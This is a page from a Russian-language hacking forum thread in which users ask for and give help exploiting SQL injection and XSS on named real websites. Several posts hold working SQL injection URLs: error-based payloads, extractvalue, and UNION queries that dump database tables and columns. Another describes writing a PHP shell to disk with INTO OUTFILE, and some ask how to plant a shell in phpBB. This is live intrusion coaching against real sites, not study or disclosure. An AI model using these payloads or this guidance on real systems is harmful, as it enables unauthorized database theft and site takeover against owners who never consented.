Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    48
    Likes Received:
    28
    Reputations:
    8
    пытаюсь, безпробельный вариант через ранд ваще нереал, нужно чтобы были одни скобки :(

    UPD:
    спс, нашел способ в том топике :D
     
    #20401 \/ITA, 15 May 2012
    Last edited: 15 May 2012
  2. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
    to \/ITA
    Увы, но в name_const() выводится только version()...
     
  3. foma2120

    foma2120 New Member

    Joined:
    5 Feb 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста, что делать если введенную xss показывает просто как текст?
     
  4. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
    to foma2120
    Больше данных, что за xss. Где, как, что показывает... Из Ваших слов ничего не понятно!
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,139
    Reputations:
    886
    что делать? открыть учебник по кодингу, и курить очень долго =\

    http://www.php.su/functions/?htmlspecialchars
     
    _________________________
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    Такой вопросец, немогу чёт понять как разкрутить ету слепую скулю

    так вроде норм
    PHP:
    http://board.ugmk.info/?type=(substring(@@version,1,1)=5)
    а так ошибка

    PHP:
    http://board.ugmk.info/?type=(ascii(substring(select+table_schema+from+information_schema.tables+limit+0,1),1,1)>0)
    чё ему там не нравится?
     
  7. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
    to qaz
    Зачем слепая? Все отлично выводится! Выберайте как Вам удобнее... ;)
    Code:
    http://board.ugmk.info/?b=1337350801+or+1+group+by+mid(version(),floor(rand(0)*2),64)+having+avg(0)--+or+1
    Code:
    http://board.ugmk.info/?b=1337350801+and+extractvalue(1,concat(0x3a,version()))--+
     
    #20407 cat1vo, 18 May 2012
    Last edited: 18 May 2012
    2 people like this.
  8. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    22
    Likes Received:
    7
    Reputations:
    0
    Как залить шелл в phpbb 2.0.21 ? Доступ в админку есть, sql injection и php инклуда на сайте нет.
     
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    952
    Likes Received:
    785
    Reputations:
    591
    ответ прост, ты как минимум забыл добавить скобки

     
    _________________________
    1 person likes this.
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    Помогите со скулёй, чёт ничего не выходит
     
  12. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    482
    Likes Received:
    190
    Reputations:
    221
    Как минимум раскручивается инъекция в order by (sortme=post_subject)
     
    #20412 Seravin, 18 May 2012
    Last edited: 18 May 2012
  13. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    1,076
    Likes Received:
    527
    Reputations:
    204

    http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=post_subject&start=1390,1--+ - TRUE => скуля в LIMIT'e.
    Такие скули можно раскрутить только если в запросе не присутствует order by.
    В данной скуле Order by уже есть, т.ч. нет.
    Или если у юзера есть file_priv то через такую скулю можно залиться:
    limit=10,1 limit 1 into outfile '/path/filename.php' lines terminated by 'olololo'-- a

    Но в другом параметре (sortme) можно скулю раскрутить через ErrorBased.
    Там скуля в параметре order by.
    http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=post_subject,(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+

    Duplicate entry '5.1.61-0+squeeze1-log1' for key 'group_key'
    //offtop я хотел чтобы человек подумал хоть, а ты...(
     
    #20413 Tigger, 18 May 2012
    Last edited by a moderator: 19 May 2012
    3 people like this.
  14. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    пздц не могу обойти. Фильтр на from table и тд...
     
  15. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    824
    Likes Received:
    350
    Reputations:
    120
    http://dnzl.ru/view_post.php?id=80%27+and+1=0+union%0Aselect+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--+
     
    3 people like this.
  16. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    2d1v утебя выводит?
     
  17. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
    to shadowrun
    Наглядный пример того, что все там видно!
    Code:
    http://dnzl.ru/view_post.php?id=80'+and+1=0+union%0Aselect+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8,9,10,11,12,13,14,15--+
     
    1 person likes this.
  18. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    меня сюда посылает http://sweb.ru/insecure
    ____________
    UPD
    А не, всё есть спс)
     
    #20418 shadowrun, 19 May 2012
    Last edited: 19 May 2012
  19. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    520
    Likes Received:
    105
    Reputations:
    53
    Ну или так постом
    id=80'and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1='1
     
    1 person likes this.
  20. er9j6@

    [email protected] Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    410
    Likes Received:
    40
    Reputations:
    23
    как таблицы вывести тут?

    http://www.yarmarka-vacancy.ru/index.php?id=-4+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%0afrom+information_schema.tables+--+&option=com_tpjobs&page=3&task=searchbyloc
     
Loading...
Thread Status:
Not open for further replies.